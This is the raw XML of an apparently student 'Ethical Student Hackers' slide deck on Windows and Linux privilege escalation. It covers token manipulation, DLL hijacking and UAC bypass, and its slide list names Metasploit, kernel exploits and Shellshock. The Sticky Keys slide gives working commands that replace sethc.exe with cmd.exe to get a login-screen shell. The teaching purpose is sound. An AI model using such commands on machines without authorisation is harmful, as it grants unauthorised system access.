              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Phishing can be used as the first step to gain access to the accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Elevating the permission can be done with getting root access or using hacking tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p17"/>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ko-KR" dirty="0"/>
              <a:t>Types of Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90219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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access Token Manipulation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
            </a:b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500" dirty="0"/>
              <a:t>fooling the system into believing that the running process belongs to someone other than the user who started the process, granting the process the permissions of the other user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Duplicating an access token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Creating a new process with an impersonated token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Leveraging username and password to create a token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1675548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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DLL Search Order Hijacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
            </a:b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34544"/>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500" dirty="0"/>
              <a:t>Attackers can perform “DLL preloading”, which is planting a malicious DLL with the same name as a legitimate DLL and it searched/found before the legitimate one. The system finds the DLL in the working folder and confuses it as a legitimate DLL and executes it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Performing search order DLL hijacking on a vulnerable program that has a higher privilege level, causing the attacker’s DLL to run at the same privilege level. This can be used to elevate privileges from user to administrator, or from administrator to SYSTEM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Covering the attack by loading the legitimate DLLS together with the malicious DLLs, so that systems appear to run as usual.</a:t>
            </a:r>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289978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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass User Account Control</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
            </a:b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500" dirty="0"/>
              <a:t>user account control (UAC) mechanism creates a distinction between regular users and administrators. , if UAC protection is not at the highest level, some Windows programs can escalate privileges, or execute COM objects with administrative privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372601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863250" y="95700"/>
            <a:ext cx="7417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Windows Sticky Keys</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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1500" dirty="0"/>
              <a:t>Need physical access to the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Need to boot to a repair disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>In command window, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy c:\windows\system32\sethc.exe c:\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Quit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, exit and restart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>At the login screen, if you click shirt key five times (sticky key prompt), then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> will show up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does it still work for Windows 10? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>Kinda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> yes, because sticky key is not a vulnerability, it is a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215196213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8114</TotalTime>
  <Words>2736</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>264</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Wingdings</vt:lpstr>
      <vt:lpstr>IBM Plex Sans</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Ethical Student Hackers</vt:lpstr>
      <vt:lpstr>The Legal Bit</vt:lpstr>
      <vt:lpstr>Code of Conduct</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Types of Privilege Escalation</vt:lpstr>
      <vt:lpstr>Windows - Access Token Manipulation </vt:lpstr>
      <vt:lpstr>Windows - DLL Search Order Hijacking </vt:lpstr>
      <vt:lpstr>Windows - Bypass User Account Control </vt:lpstr>
      <vt:lpstr>Windows Sticky Keys</vt:lpstr>
      <vt:lpstr>Windows Sticky Keys</vt:lpstr>
      <vt:lpstr>WinPEAS</vt:lpstr>
      <vt:lpstr>Linux Privilege Escalation</vt:lpstr>
      <vt:lpstr>Linux Privilege Escalation</vt:lpstr>
      <vt:lpstr>Linux – Exploiting SUDO Rights</vt:lpstr>
      <vt:lpstr>LinPEAS</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Privilege Escalation Using Aurora</vt:lpstr>
      <vt:lpstr>Privilege Escalation Using Aurora</vt:lpstr>
      <vt:lpstr>Linux - Kernel Exploit</vt:lpstr>
      <vt:lpstr>Kernel Exploit using Exploit-DB</vt:lpstr>
      <vt:lpstr>Kernel Exploit using Exploit-DB</vt:lpstr>
      <vt:lpstr>Kernel Exploit using Exploit-DB</vt:lpstr>
      <vt:lpstr>After gaining root access…</vt:lpstr>
      <vt:lpstr>After gaining root access…</vt:lpstr>
      <vt:lpstr>After gaining root access…</vt:lpstr>
      <vt:lpstr>Exploit Shellshock vulnerability</vt:lpstr>
      <vt:lpstr>Exploit Shellshock vulnerability</vt:lpstr>
      <vt:lpstr>Upcoming Sessions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Student Hackers</dc:title>
  <cp:lastModifiedBy>SoHyun Park</cp:lastModifiedBy>
  <cp:revision>70</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-23T00:15:19Z</dcterms:modified>
</cp:coreProperties>
</file>